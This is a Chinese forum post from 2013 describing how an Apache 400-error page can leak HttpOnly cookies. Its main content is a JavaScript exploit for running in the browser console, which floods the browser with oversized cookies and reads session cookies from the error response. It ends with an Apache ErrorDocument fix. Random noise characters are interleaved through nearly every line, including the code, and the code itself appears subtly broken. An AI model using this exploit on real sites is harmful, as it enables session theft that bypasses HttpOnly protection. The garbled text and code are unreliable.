很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
/ X7 D$ a" B# c5 k$ u. O! o0 E( C
& D/ l+ R) ^/ b b! @用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
* ~8 H' O; T9 O: l6 s
P. S# H, p2 Q2 H: [
( X% f u% P6 J// http://www.exploit-db.com/exploits/18442/
8 _4 Q0 w) H$ a2 Z) b1 }% W3 t3 tfunction setCookies (good) {8 {9 Z8 u, V- I2 e' s; w
// Construct string for cookie value
% i! v9 G- l7 c, v1 ?" ^var str = "";
; p1 \9 S6 p7 T1 l7 S5 N8 `; Vfor (var i=0; i< 819; i++) {; F3 f: R) ^% G9 k
str += "x";# H `8 \% W$ f n. I
}
' o' ?8 f3 ]. m0 W. N// Set cookies
- n( B' ^6 H, V/ p T( N+ I; lfor (i = 0; i < 10; i++) {
4 Z0 X$ {1 B. m6 O// Expire evil cookie5 C6 D. |! g z- u O) n; ]2 D- E
if (good) {
' b, E' s$ L+ r1 \- Nvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";( k- D" T, A9 p
}
7 N X& r7 E8 u! O7 P+ F$ y( s// Set evil cookie$ Y+ I! L" }* j$ I2 q" f
else {! b3 v( L R# f q1 z: f7 I
var cookie = "xss"+i+"="+str+";path=/";0 S. l' p* n. V
}( w! t3 w. h9 U! I0 d/ l$ r1 P* p$ e
document.cookie = cookie;
/ J1 a# ]5 `$ l5 o}" a1 R4 N6 O$ }5 F2 c4 O
}
" u$ M9 \; l. {6 l' ?' f* mfunction makeRequest() {
' H: u! P4 v3 m8 h/ |7 V; }6 s" DsetCookies();
9 w1 w% a2 U' Y( `0 ]5 L( Qfunction parseCookies () {
1 }. i$ d( k9 i) xvar cookie_dict = {};) w9 S5 a! v# y( [( |* P( Y
// Only react on 400 status( ~3 l" a+ j- s, F
if (xhr.readyState === 4 && xhr.status === 400) {- ]; u2 Z7 w- K q# M( u1 O
// Replace newlines and match <pre> content6 I' |) T6 c0 c
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);3 H' b: j; R2 _% t3 N& S
if (content.length) {
~. y" b5 M( u// Remove Cookie: prefix7 h3 u/ d; F6 B- x8 e' U8 m$ I
content = content[1].replace("Cookie: ", "");
0 f9 v4 j. m o) c8 Cvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);% \( T5 a( n( n4 B7 n# E0 `- F- i; q
// Add cookies to object
4 a% W8 t4 q7 ?7 m1 _for (var i=0; i<cookies.length; i++) {
! W% ^8 z8 g* n5 Z" @var s_c = cookies.split('=',2);
9 {0 n' }2 P( T* `: ]' v& H: m) ^cookie_dict[s_c[0]] = s_c[1];+ Y% Q; m+ d0 v t m% k
}
3 i9 p$ n. q. ~1 z4 Q}
; N) Z' a" n( y; e; B; R h0 v6 y// Unset malicious cookies3 I0 i# ?$ n4 W
setCookies(true);
( p) \, v1 F$ G! t; k) I8 O$ Xalert(JSON.stringify(cookie_dict));/ d7 M( w: S. s
}
- ]5 h v/ i6 \, b" c" w4 m) l7 N}
% b' L, ~6 ?# M// Make XHR request
7 _7 C0 L) q, wvar xhr = new XMLHttpRequest();5 @* d) W) E3 s) X
xhr.onreadystatechange = parseCookies;
- t0 \' D- h% X, T. v$ fxhr.open("GET", "/", true);
* ?/ B% u; a& {4 ~# {' K8 c* @2 M6 _5 S- Gxhr.send(null);
' P0 @+ b l; m( u, n" Q- Y}
Q* R( B* U( q0 b3 A0 pmakeRequest();* {/ U7 Y, Q n! b4 f. f
# \) p) e+ X" U) T你就能看见华丽丽的400错误包含着cookie信息。' R6 q$ H' q) O u) O& S) N) r0 O# @
5 D$ X! n7 |0 q9 K! ~. E7 ?) A
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
3 N" _. P. M5 N: z! d. {
- L* ]# R1 ^% Q j修复方案:% {7 y1 y Z- O# Q5 {& S/ O
+ I0 p: I: D5 o! r: a B. CApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
6 w. R. n: V2 ^- w6 @/ f3 Z7 h
5 y: N& H' v+ `! g5 XIn the event of a problem or error, Apachecan be configured to do one of four things,
' ?/ S. j9 Z) z7 d; T1 t; C0 V
4 c; l* r* H B3 O1. output asimple hardcoded error message输出一个简单生硬的错误代码信息& f) B/ t) D, u0 w' s* k
2. output acustomized message输出一段信息
) W& M6 ~+ `* q( u3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
9 ^6 }6 Y1 ^1 S) l# E4. redirect to an external URL to handle theproblem/error转向一个外部URL/ j0 x8 N F$ d+ }* N7 ^
6 H5 P2 r3 i; `$ R经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
- Z" I. |8 i `/ ^, Z
c" K6 z# n7 p: vApache配置:
: P6 o8 n. I4 K! q1 Y6 P' P+ F, E; T6 e* a( k
ErrorDocument400 " security test", |' E; g a% U
, T8 Y# {- b1 b1 d0 p0 ?2 Q) m7 T当然,升级apache到最新也可:)。; h% u" b8 ?( c8 U
5 H, s- G, q" ?3 y& E, S4 {参考:http://httpd.apache.org/security/vulnerabilities_22.html! p; \0 d2 A" [- ]6 V& A
1 K0 b3 Z* s4 _% {6 Y( c/ X; m |
发表于 2013-4-19 19:15:43
收藏
支持
反对